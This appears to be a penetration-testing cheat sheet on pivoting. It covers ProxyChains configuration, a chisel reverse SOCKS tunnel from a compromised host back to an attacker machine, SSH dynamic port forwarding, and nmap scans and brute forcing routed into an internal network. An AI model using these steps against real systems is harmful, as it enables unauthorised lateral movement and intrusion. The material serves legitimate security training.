Pivoting ( ProxyChains )
Pivoting lets the attacker access the services/machines the compromised machines connected to.
Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine
Image by VickieLi
Tools Required:
- ProxyChains
sudo apt install proxychains
- SSH / CHISEL
NEED: With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,)
kali -> proxychains -> compromised_machine -> request for accessing from internal_machine -> internal_machine:80
- After installing proxychains in the attackers machine
- Configure the port that will be used by the proxychains with its protocol being SOCK Proxy
sudo vi /etc/proxychains.conf
# comment the last line 9050 --> used by TOR
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051
- Perform Dynamic port forwarding
- When SSH Password is not available, make use of chisel to perform
- Start a chisel server on the attacker machine
# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse
- On the compromised machine connect to the attackers reverse connection
# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a debian based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine
- Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to
2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
- By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080)
sudo vi /etc/proxychains.conf
# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080
- Now we can execute commands with proxychains
proxychains nmap -p- internalIp
Proxychains with chisel
Legend
- Perform Dynamic Port Forwarding
ssh -D 9051 [email protected] # 9051 is the port configured in proxychains.conf file
- Once the connection initializes, an attacker can use proxychains to leverage the attack surface
Proxychains with SSH
- Legend
- 1 - Added the port 9051 in the /etc/proxychains config file
- 2 - Inspecting the port activity of 9051 in attackers machine
- 3 - Dynamic port forwarding to the port configured in proxychains
-D 9051 - 4 - Activity on the port 9051 in attakcers machine
- 5 - Grabbing banner of the service running on port 25 in the compromised machine
- 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine
Bruteforces / Automated attack tools can be used with proxychains